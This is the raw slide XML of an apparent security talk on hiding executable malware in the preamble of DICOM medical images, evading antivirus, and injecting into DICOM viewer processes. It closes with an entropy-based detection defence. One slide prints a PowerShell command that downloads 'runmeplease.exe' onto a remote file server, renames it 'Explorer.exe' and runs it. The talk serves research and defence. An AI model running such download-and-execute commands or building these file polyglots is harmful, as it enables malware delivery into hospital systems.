            <a:endParaRPr lang="en-US" sz="3600" cap="all" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>HIJACKING DICOMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ref paper</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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 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5650523" y="2284946"/>
            <a:ext cx="10131120" cy="3648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latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Cyrela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 Labs worked on a POC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Embedded PE file inside DICOM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More of a non-steganographic detections </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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endParaRPr lang="en-US" sz="20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E4E6381-3B91-6670-B719-B6763A109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3" y="927098"/>
            <a:ext cx="5287321" cy="52873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8165123" y="2242109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cap="all" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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Picture 1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3444C6A-3735-80F9-9AEF-030E9373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1146419"/>
            <a:ext cx="4078654" cy="51030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Infiltrating dicoms (</a:t>
            </a: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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Ref</a:t>
            </a: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)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4" name="Picture 123"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="222480" y="2243520"/>
            <a:ext cx="3597120" cy="3660480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="125" name="Picture 124"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4104000" y="2232000"/>
            <a:ext cx="3495240" cy="3685680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="126" name="Content Placeholder 4_1" descr="Diagram, table&#10;&#10;Description automatically generated"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7962120" y="1584000"/>
            <a:ext cx="3341880" cy="460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908538" y="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</a:rPr>
              <a:t>Logic behind the magic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685800" y="2142000"/>
            <a:ext cx="4943880" cy="36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DICOM Readers ignore the preamble and private tags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EXE parsers jump from DOS Header to the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Calibri"/>
              </a:rPr>
              <a:t>elfanew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 pointer location directly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Who cares what lies between them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="0" strike="noStrike" spc="-1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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7F1CBBA-FA75-00FC-11EA-6F95D65C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22" y="427892"/>
            <a:ext cx="5450595" cy="57789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3384062" y="-99501"/>
            <a:ext cx="10131120" cy="674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IN" sz="3200" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>HELLO, HUMANS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-IN" sz="3200" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-IN" sz="3200" b="0" strike="noStrike" spc="-1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IN" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Yours </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>cyberly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-IN" sz="3200" b="0" strike="noStrike" spc="-1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IN" sz="3200" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN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556B113-2BF4-BBAC-F783-58EAEA197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1217919"/>
            <a:ext cx="4689229" cy="46892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6717240" y="1030320"/>
            <a:ext cx="4099680" cy="1035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/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3300" b="0" strike="noStrike" cap="all" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>EVASIVE and Hello AV Vendors ! </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="33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660600" y="639000"/>
            <a:ext cx="5433480" cy="5574960"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3449"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="5076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943200" y="732960"/>
            <a:ext cx="4130640" cy="3201120"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4207"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blip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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753120" y="4168440"/>
            <a:ext cx="5239440" cy="1266840"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4528"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="507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TextShape 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6717240" y="2142000"/>
            <a:ext cx="4814160" cy="3648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Sandboxes don’t detect it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Still looks like a DICOM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latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Booooom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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Other Attacks 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3758077" y="2968381"/>
            <a:ext cx="10131120" cy="36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Steganography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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>AV Evasions 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C2 Callbacks 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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Process injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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B92D83CE-CBB5-F59E-B5D2-60A6A3833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52246"/>
            <a:ext cx="28575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DA2E4-8FFB-4844-B736-ECBDBC804E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Lead Security Researcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat and Malware Hunter </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ambatman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B8F561-CE10-9F48-B9C2-83B96D97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059D1-0238-F140-9996-E7EF55C782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809" y="4759640"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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DBAD21-86CD-C34E-97DD-9A35278FC836}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="834405" y="4768021"/>
            <a:ext cx="914400" cy="914400"/>
            <a:chOff x="1938145" y="3766414"/>
            <a:chExt cx="685800" cy="6858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DDDDA-8529-884E-B7B6-97BAD6E3EEC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1938145" y="3766414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2F514F-1624-C245-AD57-AB1AA766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648" y="4033469"/>
              <a:ext cx="510794" cy="15169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D573E-A07A-BE47-997A-9BD60ED0D8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897" y="2003"/>
            <a:ext cx="6095999" cy="6855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BA7B4-E135-E044-B788-9074DD543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397" y="4878695"/>
            <a:ext cx="1240505" cy="72362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CF8FCC-7CCD-7447-B654-CEB1478F0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451" y="4937865"/>
            <a:ext cx="1528132" cy="669123"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing indoor, sitting, room, small&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{487DAC22-2BC1-9B41-B479-7785EE83D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03" y="0"/>
            <a:ext cx="6095999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519FF6-7FDD-D94D-B36B-95C07FE57853}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="99644" y="5630127"/>
            <a:ext cx="914400" cy="914400"/>
            <a:chOff x="1938145" y="3766414"/>
            <a:chExt cx="685800" cy="685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23A90A-2216-B349-AA49-3F89C25DF0EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1938145" y="3766414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92C164-6387-1048-ACD1-A11C8AE6C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648" y="4033469"/>
              <a:ext cx="510794" cy="1516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FED7151-091F-3B4A-9605-96C09A971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408" y="5633407"/>
            <a:ext cx="914400" cy="91440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FAEBC1-51CC-1D4D-B77F-7634738D1376}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2" y="353946"/>
            <a:ext cx="4811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Sr.Staff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Cyber Security Architect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B61D86-6DC6-C042-9AF3-A3B23ACEBDA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6078898" y="1430870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Threat and Malware Hunter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C1BBA-0A68-AC4C-8BF2-211DF2F2DC6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7055047" y="5326347"/>
            <a:ext cx="181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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ambatman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E7804F-0EC4-C441-9AF5-C241F5475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2" y="1"/>
            <a:ext cx="3676615" cy="5326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FE3AA4-1FA6-5FB2-C610-D9189C1BAE96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4022853" y="6123403"/>
            <a:ext cx="2844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Masters in Digital Forensics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2185DC-BA4A-AC85-5320-CDED69E53BED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2323236" y="5150656"/>
            <a:ext cx="2552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Document malwares</a:t>
            </a:r>
          </a:p>
          <a:p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Memory Forensics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DC68E-22D2-A096-C299-A20A3C797E7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2430170" y="1148280"/>
            <a:ext cx="117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14 years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47C568-1CCB-4367-1A6C-F00C218350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150" y="994463"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse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6078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2373923" y="52536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Hiding inside image? Well, not a newcomer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5751360" y="2519917"/>
            <a:ext cx="10131120" cy="3648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Distortion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Spatial Domain methods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Statistical techniques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Vector Embedding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Spread Spectrum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="A person wearing a hat and sunglasses&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DF09F1D-65C4-347C-FCC7-F0F2C26C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6" y="2047855"/>
            <a:ext cx="4284785" cy="42847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47-2F6E-55C3-91D3-6CA9BF67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55" y="117847"/>
            <a:ext cx="5389714" cy="3106732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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" spc="-200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INJECTION ! </a:t>
            </a:r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FCF722C-3EBD-7F32-802C-38982F90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8" y="1930388"/>
            <a:ext cx="3972221" cy="29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7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AA74-F030-BA4F-8431-BAAEEDAC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6583" y="1971213"/>
            <a:ext cx="3982400" cy="2915574"/>
          </a:xfrm>
          <a:noFill/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/>
            <a:r>
              <a:rPr lang="en-US" sz="3067" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code Injection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CDC5905A-64CB-40E0-B5AE-BA0838D380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47575"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6081712" y="725488"/>
          <a:ext cx="5141912" cy="540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F4C2BE4-C33A-B3D4-6DD8-7C936DFB9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844061"/>
            <a:ext cx="4888523" cy="48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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC29D91-08CF-5F0B-5BBD-408F717A3D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84817" y="108360"/>
            <a:ext cx="10131120" cy="674964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Process Injection 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B0DC8-8F87-D840-8B00-8767D6980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6" b="4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="1009109"/>
            <a:ext cx="4319937" cy="584889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A4D53-957F-9BBA-913F-8BAECFF0C450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="63310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182880" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image credits: Brad </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2549255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DDE41C-0D83-154C-7952-DDA7371A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668" y="2376863"/>
            <a:ext cx="2640647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067" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LINUX PROCESS INJECTION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3600483-7357-7EA2-2C42-B5384AC03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243177"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6081712" y="725488"/>
          <a:ext cx="5141912" cy="540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2592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966441" y="335285"/>
            <a:ext cx="8225559" cy="1650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Process injection, The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="0" strike="noStrike" cap="all" spc="-1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>dicom</a:t>
            </a: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 viewers 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4311221" y="1691935"/>
            <a:ext cx="7271280" cy="3908160"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4380"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="5076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247447-A552-9E06-F014-0BBB9C3B9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90" y="2361462"/>
            <a:ext cx="3596390" cy="2316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3FDBD-7AAF-2248-ABE3-6E3F84D5DFA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5228491" y="560009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Infecting DICOM Viewer process  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="317129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F9C170-6321-6BF7-4012-0D8EA5FC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805"/>
            <a:ext cx="10131120" cy="1455840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" spc="-200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why not get the interpreter? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing text, vegetable, several&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73CF4667-173E-AE95-BC38-96EC6801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8"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7545273" y="0"/>
            <a:ext cx="4646727" cy="685798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778A8-EEDD-57EB-6B8C-2D2A79DA95F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2851089" y="2450123"/>
            <a:ext cx="67524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Getting into a new territory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bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="0" i="0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rivilege Inheritance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dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro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bg1"/>
                </a:solidFill>
                <a:latin typeface="Source Sans Pro" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Launch inside memory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>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Source Sans Pro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3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BD79F8-F583-5C90-111A-749166F6AD9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780717" y="4037936"/>
            <a:ext cx="10131120" cy="3648600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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Invoke-Command -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ComputerName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FileServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ScriptBlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{ New-Item -Path “C:\” -Name “Files” -ItemType “Directory” Invoke-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -URI ‘http:///</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>runmeplease.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Outfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘C:\Files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ Invoke-Expression -Command “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /c c:\files\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>explorer.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN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E057B-BD59-0ACC-0DE3-BD73CC48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-57431"/>
            <a:ext cx="10131120" cy="1455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power of shell, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>powershell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5DDD669-9CF3-245A-AA21-63912F4C1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68" y="995764"/>
            <a:ext cx="5943345" cy="31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2866292" y="-371760"/>
            <a:ext cx="10131120" cy="674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IN" sz="3600" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DEFENCE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BD2DF97-75E5-1FD3-1654-537EAD38F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6" y="888999"/>
            <a:ext cx="5488881" cy="548888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lue, porcelain&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3D7021B-649F-0287-0838-3E64B9A8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47" y="1130300"/>
            <a:ext cx="8815511" cy="53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4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685800" y="609480"/>
            <a:ext cx="521928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Some history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685800" y="2142000"/>
            <a:ext cx="5219280" cy="3648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Radiology &amp; Medical Imaging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X-RAY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Computed Tomography (CT)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Magnetic Resonance Imaging (MRI)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Ultrasound </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6198840" y="639000"/>
            <a:ext cx="5721120" cy="5514480"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4380"/>
            </a:avLst>
          </a:prstGeom>
          <a:blipFill rotWithShape="0">
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="1630" r="7332" b="-5"/>
            </a:stretch>
          </a:blipFill>
          <a:ln w="5076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Defensive trick , Entropy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1138639" y="3577856"/>
            <a:ext cx="10131120" cy="3648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Entropy: Measure of randomness.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Leveraging Shannon’s entropy to find noisy data in the preamble section of DICOMs.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3018868" y="2388027"/>
            <a:ext cx="4514400" cy="126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703277" y="51066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</a:rPr>
              <a:t>Why Entropy ?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4314756" y="2112660"/>
            <a:ext cx="10131120" cy="160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Can scan large DICOM files in constant time ( O(1) )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Faster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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Cau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ses negligible overhead ( Static analysis )</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
